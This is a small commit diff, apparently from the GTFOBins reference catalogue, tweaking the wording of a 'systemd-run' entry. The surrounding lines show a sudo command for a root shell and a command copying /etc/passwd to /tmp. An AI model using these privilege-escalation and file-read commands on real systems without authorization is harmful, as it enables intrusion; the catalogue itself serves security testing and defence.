[New GTFOBin] Systemd-run

This commit is contained in:
Ruben Groenewoud 2024-08-26 17:56:26 +02:00
parent 437803e1b0
commit b13745061f

View File

@ -23,7 +23,7 @@ functions:
- description: Gain a root shell using `sudo` and `systemd-run` with a pseudo-terminal (PTY). - description: Gain a root shell using `sudo` and `systemd-run` with a pseudo-terminal (PTY).
code: sudo systemd-run --pty /bin/sh code: sudo systemd-run --pty /bin/sh
file-read: file-read:
- description: Read the contents of a file and redirect the output to another file. In this case, the contents of `/etc/passwd` are copied to `/tmp/passwd`. - description: Read the contents of a file and redirect the output to another file. In this example, the contents of `/etc/passwd` are copied to `/tmp/passwd`.
code: systemd-run /bin/sh -c "/bin/cat /etc/passwd > /tmp/passwd" code: systemd-run /bin/sh -c "/bin/cat /etc/passwd > /tmp/passwd"
file-write: file-write:
- description: Write data to a specific file. The filename should be absolute. In this example, the string "DATA" is written to `/tmp/file`. - description: Write data to a specific file. The filename should be absolute. In this example, the string "DATA" is written to `/tmp/file`.